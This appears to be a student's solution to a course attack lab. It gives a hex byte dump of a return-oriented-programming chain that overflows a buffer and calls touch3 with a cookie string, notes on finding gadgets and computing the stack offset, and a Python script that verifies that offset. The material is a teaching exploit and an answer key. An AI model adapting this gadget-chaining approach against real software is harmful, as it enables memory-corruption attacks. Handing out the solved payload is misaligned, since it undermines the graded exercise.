One possible answer:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */
00 00 00 00
a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */
00 00 00 00
ab 19 40 00 /* 3 <addval_219> popq %rax */
00 00 00 00
48 00 00 00 /* bias */
00 00 00 00
dd 19 40 00 /* 4 <getval_481> movl %eax,%edx */
00 00 00 00
69 1a 40 00 /* 5 <getval_311> movl %edx,%ecx */
00 00 00 00
13 1a 40 00 /* 6 <addval_436> movl %ecx,%esi */
00 00 00 00
d6 19 40 00 /* 7 <add_xy> lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* 8 <addval_273> movq %rax,%rdi */
00 00 00 00
fa 18 40 00 /* address of function touch3 */
00 00 00 00
35 39 62 39 /* cookie string */
39 37 66 61
00
Summary of the steps:
1. Disassemble the binary and copy the assembly code into an IDE.
2. Search for the instruction keywords, find every usable code fragment (gadget), and write them down on paper.
3. Think about how the instructions can be combined and work out the approach. You will notice that there are very few instructions involving %rsp and very few popq instructions, yet both are indispensable; that is where the breakthrough is.
4. Write the instructions down in order first, then compute the bias. This calculation is very error-prone: note that by the time %rsp is copied into %rax, %rsp has already grown by 0x28+0x8 relative to its original value (0x28 is the size of the string buffer the program allocates, 0x8 is the effect of executing one ret).
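Because step 4's offset arithmetic is the part that is easiest to get wrong, the following added example (my own check, not code from the original write-up) parses the byte dump shown above into 8-byte stack slots and re-derives the bias from the layout, so the hand calculation can be confirmed mechanically. It assumes the 0x28-byte buffer size and the entry order exactly as given on this page; the dump text is a constructed copy of the listing with its comments kept.

```python
import re
import struct

# Size of the string buffer the program allocates before the saved return address (0x28 = 40 bytes).
BUFFER_SIZE = 0x28

# Constructed copy of the byte dump from the write-up: one 4-byte group per line,
# little-endian, with the original /* ... */ annotations left in place.
DUMP = """\
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */
00 00 00 00
a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */
00 00 00 00
ab 19 40 00 /* 3 <addval_219> popq %rax */
00 00 00 00
48 00 00 00 /* bias */
00 00 00 00
dd 19 40 00 /* 4 <getval_481> movl %eax,%edx */
00 00 00 00
69 1a 40 00 /* 5 <getval_311> movl %edx,%ecx */
00 00 00 00
13 1a 40 00 /* 6 <addval_436> movl %ecx,%esi */
00 00 00 00
d6 19 40 00 /* 7 <add_xy> lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* 8 <addval_273> movq %rax,%rdi */
00 00 00 00
fa 18 40 00 /* address of function touch3 */
00 00 00 00
35 39 62 39 /* cookie string */
39 37 66 61
00
"""

COOKIE = b"59b997fa"  # the ASCII cookie string at the end of the dump


def parse_dump(text):
    """Strip the /* */ annotations and turn the hex groups into raw bytes."""
    hex_bytes = re.sub(r"/\*.*?\*/", "", text).split()
    return bytes(int(h, 16) for h in hex_bytes)


def chain_words(payload):
    """Return the 8-byte little-endian slots after the buffer, plus the cookie offset."""
    cookie_off = payload.index(COOKIE)
    slots = [struct.unpack_from("<Q", payload, off)[0]
             for off in range(BUFFER_SIZE, cookie_off, 8)]
    return slots, cookie_off


def rsp_at_gadget1():
    """%rsp when gadget 1 (movq %rsp,%rax) runs.

    Offset 0x28 is the overwritten return address; the ret that transfers control
    to gadget 1 pops it, so %rsp already points 8 bytes further: 0x28 + 0x8."""
    return BUFFER_SIZE + 8


def expected_bias(payload):
    """Distance from %rsp at gadget 1 to the cookie string: the value popq must load."""
    _, cookie_off = chain_words(payload)
    return cookie_off - rsp_at_gadget1()


def bias_in_payload(payload):
    """The slot gadget 3 (popq %rax) actually consumes: the entry after the first three gadgets."""
    slots, _ = chain_words(payload)
    return slots[3]


if __name__ == "__main__":
    payload = parse_dump(DUMP)
    print("derived bias: %#x, bias in dump: %#x" % (expected_bias(payload), bias_in_payload(payload)))
```

If the two values disagree, one of the slots was miscounted; the check also catches the common slip of measuring from the start of the buffer (or from the overwritten return address) instead of from %rsp after the first ret.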